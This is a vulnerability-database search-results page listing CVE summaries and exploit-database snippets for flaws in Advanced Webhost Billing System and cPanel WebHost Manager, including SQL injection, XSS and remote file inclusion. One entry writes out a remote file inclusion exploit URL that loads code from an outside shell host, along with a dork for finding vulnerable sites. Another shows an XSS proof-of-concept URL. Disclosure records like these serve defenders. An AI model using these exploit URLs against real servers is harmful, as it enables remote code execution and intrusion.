121 matches found
CVE-2008-2903
SQL injection vulnerability in news.php in Advanced Webhost Billing System AWBS 2.3.3 through 2.7.1, when magicquotesgpc is disabled, allows remote attackers to execute arbitrary SQL commands via the viewnews parameter...
Default configuration
Unspecified vulnerability in Advanced Webhost Billing System AWBS before 2.6.0 allows remote authenticated users to obtain configuration data about other dedicated servers via unspecified vectors...
CVE-2007-4112
Multiple SQL injection vulnerabilities in Advanced Webhost Billing System AWBS before 2.6.0, when magicquotesgpc is disabled, allow remote attackers to execute arbitrary SQL commands via unspecified vectors. NOTE: this can be leveraged for XSS attacks that "bypass AWBS's anti-XSS input validation...
CVE-2007-4113
Unspecified vulnerability in Advanced Webhost Billing System AWBS before 2.6.0 allows remote authenticated users to obtain configuration data about other dedicated servers via unspecified vectors...
Advanced Webhost Billing System Cart2.PHP远程文件包含漏洞
Advanced Webhost Billing System是一款基于PHP的WEB应用程序。 Advanced Webhost Billing System不正确过滤用户提交的输入,远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'cart2.php'脚本对用户提交的'workdir'参数缺少过滤,指定远程服务器上的文件作为包含参数,可导致以WEB权限执行任意命令。 Advanced Webhost Billing System AWBS 2.4 目前没有解决方案提供: http://www.awbs.com/...
Advanced Webhost Billing System (AWBS) 2.4.0 - cart2.php Remote File Inclusion
Advanced Webhost Billing System AWBS 2.4.0 - cart2.php Remote File Inclusion AWBS v2.4.0 Remote file includecart2.php Demo : http://www.awbs.com/demo.php D0rk : Ä°nurl:awbs.php Home Page: Www.SiberAktif.Net Exploit...
Advanced Webhost Billing System (AWBS) 2.4.0 - 'cart2.php' Remote File Inclusion
AWBS v2.4.0 Remote file includecart2.php Demo : http://www.awbs.com/demo.php D0rk : Ä°nurl:awbs.php Home Page: Www.SiberAktif.Net Exploit http://localhost/gpbpath/docs/front-end-demo/cart2.php?workdir=http://sh3ll.com/for.txt? Discovered by : DamaR [email protected] milw0rm.com 2007-04-24...
xss in phpmyadmin >=2.8.0 and < 2.10.0
This xss with xsrf possibility works only when logged in, but since in many places anonymous logins are allowed and many webhost companies offer just 1 or few phpmyadmins for a large number of users, i consider it worth to be published. Theoretically it is possible to obtain and use the cookie an...
Cross site scripting
Cross-site scripting XSS vulnerability in scripts/passwdmysql in cPanel WebHost Manager WHM 11.0.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the password parameter...
CVE-2007-0854
Remote file inclusion vulnerability in scripts2/objcache in cPanel WebHost Manager WHM allows remote attackers to execute arbitrary code via a URL in the obj parameter. NOTE: a third party claims that this issue is not file inclusion because the contents are not parsed, but the attack can be used...
CVE-2006-6548
Multiple cross-site scripting XSS vulnerabilities in cPanel WebHost Manager WHM 3.1.0 allow remote authenticated users to inject arbitrary web script or HTML via the domain parameter to 1 scripts2/changeemail, 2 scripts2/limitbw, or 3 scripts/rearrangeacct. NOTE: the feature parameter to...
[Aria-Security Team] CentOS 4.2 i686 - WHM X v3.1.0 Cross-Site Scripting
cAria-Security Team Advisory www.Aria-security.Com For English www.Aria-Security.net For Persian Original Advisory: http://www.aria-security.com/forum/showthread.php?t=44 ----------------------------------------------------------- Software: WebHost Manager WHM Tested WHM X v3.1.0 demo.cpanel.net...
aria-whm.txt
cAria-Security Team Advisory Original Advisory: http://www.aria-security.com/forum/showthread.php?t=44 ----------------------------------------------------------- Software: WebHost Manager WHM Tested WHM X v3.1.0 demo.cpanel.net Poc: http://target:2086/scripts2/changeemail?domain=dXSS...
CVE-2006-6198
Multiple cross-site scripting XSS vulnerabilities in cPanel WebHost Manager WHM 3.1.0 allow remote authenticated users to inject arbitrary web script or HTML via the 1 email parameter to a scripts2/dochangeemail, the 2 supporturl parameter to b cgi/addonconfigsupport.cgi, the 3 pkg parameter to c...
aria-webhost.txt
Aria-Security Team Advisory Original Advisory: http://www.aria-security.com/forum/showthread.php?t=44 ----------------------------------------------------------- Software: WebHost Manager WHM Tested WHM X v3.1.0 demo.cpanel.net Poc:...
cPanel WebHost Manager 3.1 - editzone?domain Cross-Site Scripting
cPanel WebHost Manager 3.1 - editzone?domain Cross-Site Scripting source: https://www.securityfocus.com/bid/21288/info WebHost Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to have...
cPanel WebHost Manager 3.1 - domts2?domain Cross-Site Scripting
cPanel WebHost Manager 3.1 - domts2?domain Cross-Site Scripting source: https://www.securityfocus.com/bid/21288/info WebHost Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to have...
cPanel WebHost Manager 3.1 - park?ndomain Cross-Site Scripting
cPanel WebHost Manager 3.1 - park?ndomain Cross-Site Scripting source: https://www.securityfocus.com/bid/21288/info WebHost Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to have...
cPanel WebHost Manager 3.1 - dofeaturemanager?feature Cross-Site Scripting
cPanel WebHost Manager 3.1 - dofeaturemanager?feature Cross-Site Scripting source: https://www.securityfocus.com/bid/21288/info WebHost Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issue...
cPanel WebHost Manager 3.1 - editpkg?pkg Cross-Site Scripting
cPanel WebHost Manager 3.1 - editpkg?pkg Cross-Site Scripting source: https://www.securityfocus.com/bid/21288/info WebHost Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to have...